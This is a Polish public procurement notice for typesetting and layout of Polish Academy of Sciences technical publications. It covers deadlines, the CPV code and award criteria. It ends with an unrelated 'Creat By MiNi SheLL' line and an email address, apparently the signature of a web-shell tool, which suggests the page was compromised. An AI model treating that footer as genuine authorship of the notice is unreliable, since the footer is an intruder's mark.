<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot zamówienia obejmuje sukcesywne świadczenie usług w zakresie przygotowania do druku (skład i łamanie) publikacji naukowych Polskiej Akademii Nauk.
Część 2 - publikacje z zakresu nauk technicznych - 378 arkuszy wydawniczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług w zakresie przygotowania do druku czasopism z zakresu nauk technicznych.
Temat: Wykonanie składu komputerowego i łamania tekstu oraz komputerowe opracowanie okładki, rysunków, zdjęć, tabel, jedno- i wielostopniowych wzorów matematycznych i chemicznych do pozycji wydawniczych z zakresu nauk technicznych. Zleceniodawca zastrzega sobie prawo wskazania programu LaTeX oraz TeX jako wymaganego przy łamaniu publikacji. Wykaz tytułów przewidzianych do realizacji został zestawiony w Załączniku nr 10 do SIWZ. 
Opis: Zamawiający zleci skład komputerowy i łamanie tekstu oraz komputerowe opracowanie okładki, rysunków, zdjęć, tabel, wzorów jedno i wielostopniowych matematycznych i chemicznych do pozycji wydawniczych z zakresu nauk technicznych, w których materiał graficzny, tabelaryczny oraz wzory stanowią powyżej 50% objętości publikacji, o objętości ogółem 378 arkuszy wydawniczych z możliwością zmniejszenia tej liczby maksymalnie o 35%.



Sposób realizacji
Zleceniodawca wymaga, aby Zleceniobiorca wykonał wszystkie Zlecenia z najwyższą starannością oraz na każdym etapie prac dokonał wewnętrznej korekty, tj. sprawdził zgodność wykonanego Zlecenia z materiałem autorskim i wprowadzonym opracowaniem edytorskim.

1.	Termin realizacji zleceń do pierwszej korekty do 15 dni roboczych od przekazania plików. Zamawiający oczekuje przekazania materiału w formie wydruku i zapisu w postaci plików pdf z podziałem na artykuły.
2.	Termin naniesienia poprawek z pierwszej korekty do 7 dni roboczych. Poprawki zostaną dostarczone w tradycyjnej formie papierowej z użyciem znaków korektorskich, (dopuszcza się formę elektroniczną poprawek: w plikach pdf lub w formie nadesłanych uwag).
3.	Termin naniesienia poprawek z drugiej korekty do 5 dni. Poprawki zostaną dostarczone
w tradycyjnej formie papierowej z użyciem znaków korektorskich, (dopuszcza się formę elektroniczną poprawek: w plikach pdf lub w formie nadesłanych uwag).
4.	Termin naniesienia poprawek z rewizji do 3 dni roboczych. Poprawki zostaną dostarczone w formie elektronicznej.
5.	Forma przekazania plików do druku - pliki kompozytowe, paleta barw CMYK. Dodatkowo zatwierdzony plik do druku z podziałem na poszczególne artykuły. Termin wykonania 1 dzień roboczy.
6.	Czas realizacji, o którym mowa w powyższych punktach, liczony jest od momentu poinformowania Wykonawcy przez Zamawiającego że materiały będące podstawą realizacji danych czynności są gotowe do odbioru, do momentu dostarczenia przez Wykonawcę materiałów (wraz z podstawą korektową) do siedziby Zamawiającego lub miejsca określonego przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Jakość - 60</li>
<li>3. Zatrudnienie na podstawie umowy o pracę - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com